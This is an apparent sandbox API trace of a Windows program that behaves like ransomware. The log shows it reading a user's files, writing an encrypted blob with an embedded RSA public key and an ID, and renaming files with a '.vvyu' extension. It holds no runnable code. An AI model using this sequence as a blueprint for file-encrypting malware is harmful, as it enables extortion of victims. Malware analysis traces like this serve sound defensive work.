[0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3398 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33f8 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33c8 [0200.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3410 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33c8 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3380 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33e0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0200.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3380 | out: hHeap=0x620000) returned 1 [0200.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0200.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3368 | out: hHeap=0x620000) returned 1 [0200.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0200.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fae0 | out: hHeap=0x620000) returned 1 [0200.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0200.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.770] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xf8c8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xf8c8, lpOverlapped=0x0) returned 1 [0200.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.772] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf8cd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.772] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0200.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0200.773] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.773] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.773] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.774] CloseHandle (hObject=0x510) returned 1 [0200.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0200.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0200.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0200.777] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\powW2.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\poww2.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\powW2.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\poww2.png.vvyu")) returned 1 [0200.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.779] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0200.782] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa542ea60, ftCreationTime.dwHighDateTime=0x1d89f6c, ftLastAccessTime.dwLowDateTime=0xac6d4410, ftLastAccessTime.dwHighDateTime=0x1d8a39b, ftLastWriteTime.dwLowDateTime=0xac6d4410, ftLastWriteTime.dwHighDateTime=0x1d8a39b, nFileSizeHigh=0x0, nFileSizeLow=0xcb20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoOkllxYjwEwP5IM.wav", cAlternateFileName="ROOKLL~1.WAV")) returned 1 [0200.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x6e2d18 [0200.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0200.782] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\RoOkllxYjwEwP5IM.wav") returned=".wav" [0200.782] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\RoOkllxYjwEwP5IM.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rookllxyjwewp5im.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.783] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=52000) returned 1 [0200.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.785] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xcafa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.785] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.788] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.788] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xcb20, lpOverlapped=0x0) returned 1 [0200.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.789] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0200.790] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.790] CryptHashData (hHash=0x2cfe0c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.790] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.790] CryptGetHashParam (in: hHash=0x2cfe0c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.790] GetLastError () returned 0x0 [0200.791] CryptDestroyHash (hHash=0x2cfe0c0) returned 1 [0200.791] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0200.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.791] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.791] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.791] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xcb20) returned 0x2ea99b0 [0200.792] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fae0 [0200.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3350 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fb28 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3368 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3398 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33b0 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.793] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0200.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea33b0 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3398 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0200.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0200.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33b0 | out: hHeap=0x620000) returned 1 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3398 | out: hHeap=0x620000) returned 1 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea33f8 | out: hHeap=0x620000) returned 1 [0200.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0200.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0200.797] GetCurrentThreadId () returned 0x66c [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea82c8 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.797] GetCurrentThreadId () returned 0x66c [0200.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 